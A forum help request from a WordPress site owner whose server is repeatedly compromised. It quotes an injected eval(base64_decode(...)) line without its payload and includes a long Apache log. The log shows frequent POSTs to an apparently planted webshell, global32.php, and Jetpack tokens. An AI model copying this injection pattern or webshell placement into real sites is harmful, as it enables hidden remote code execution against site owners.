DigitalOcean Wordpress instance getting attacked

February 13, 2017
WordPress Apache Ubuntu

Hey,

I've got a WordPress instance set up from the one-click DigitalOcean installer. It runs fine most of the time, but I keep getting attacked, causing the site to go down.

I have already set up JetPack as described in this article to prevent RPC attacks, but I still seem to be getting screwed.

This keeps getting injected into my PHP files (wp-config.php, index.php, wp-settings.php, etc.):

eval(base64_decode("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"));

I believe RPC is working, as when I check attacks they are all just JetPack. The results from grep xmlrpc /var/log/apache2/access.log are:

108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"

There are some fishy-looking POSTs in my Apache logs, but I'm not sure if they're related:

162.158.59.140 - - [13/Feb/2017:14:03:36 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:04:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:05:34 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:05:37 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:06:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:06:21 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:06:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.59.128 - - [13/Feb/2017:14:06:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
162.158.58.211 - - [13/Feb/2017:14:06:56 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:07:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:07:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:08:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:08:20 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:22 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:27 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:29 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:38 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:56 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:09:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:09:55 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:11:23 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:12:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:12:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:13:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.134 - - [13/Feb/2017:14:13:33 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
108.162.222.164 - - [13/Feb/2017:14:13:42 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:14:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:14:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:15:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.68 - - [13/Feb/2017:14:15:49 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.69.31 - - [13/Feb/2017:14:16:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:16:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.245.38 - - [13/Feb/2017:14:17:03 -0500] "GET /nate?_escaped_fragment_= HTTP/1.1" 500 206 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
162.158.69.31 - - [13/Feb/2017:14:17:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:17:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:17:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.69.31 - - [13/Feb/2017:14:18:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:18:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:19:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.128 - - [13/Feb/2017:14:19:17 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
172.68.25.74 - - [13/Feb/2017:14:19:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:20:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:20:15 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:21:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:22:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:22:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
188.114.110.248 - - [13/Feb/2017:14:22:45 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
108.162.241.86 - - [13/Feb/2017:14:22:50 -0500] "GET /2016/the-count-of-monte-cristo-dumas/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.178.13 - - [13/Feb/2017:14:23:07 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:09 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:13 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:23:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:23:18 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:23 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.65.76 - - [13/Feb/2017:14:23:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:24:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:24:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:25:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:26:06 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:26:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.2.98 - - [13/Feb/2017:14:26:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
172.68.10.62 - - [13/Feb/2017:14:26:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"
162.158.59.104 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D" "Jetpack by WordPress.com"
162.158.62.103 - - [13/Feb/2017:14:26:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:27:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:27:25 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.46.63 - - [13/Feb/2017:14:27:27 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D" "Jetpack by WordPress.com"
108.162.215.134 - - [13/Feb/2017:14:27:29 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D" "Jetpack by WordPress.com"
162.158.59.236 - - [13/Feb/2017:14:27:30 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D" "Jetpack by WordPress.com"
162.158.78.44 - - [13/Feb/2017:14:27:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:28:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:29:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.237.20 - - [13/Feb/2017:14:29:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
172.68.51.152 - - [13/Feb/2017:14:29:46 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:30:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.242 - - [13/Feb/2017:14:30:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:31:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:31:19 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:32:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:32:40 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:32:43 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.78.44 - - [13/Feb/2017:14:32:43 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:32:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.178.13 - - [13/Feb/2017:14:32:59 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:04 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:06 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:33:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
141.101.80.200 - - [13/Feb/2017:14:33:16 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:20 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.22.188 - - [13/Feb/2017:14:33:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:34:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.102.200 - - [13/Feb/2017:14:34:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.212 - - [13/Feb/2017:14:34:40 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:35:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:36:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.143.250 - - [13/Feb/2017:14:36:48 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.59.128 - - [13/Feb/2017:14:36:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"

At the moment I have been going through and removing all the 'eval('s to get my site working again, but this is hardly a long-term solution. I need some help getting this fixed.

Cheers,
Sebastian
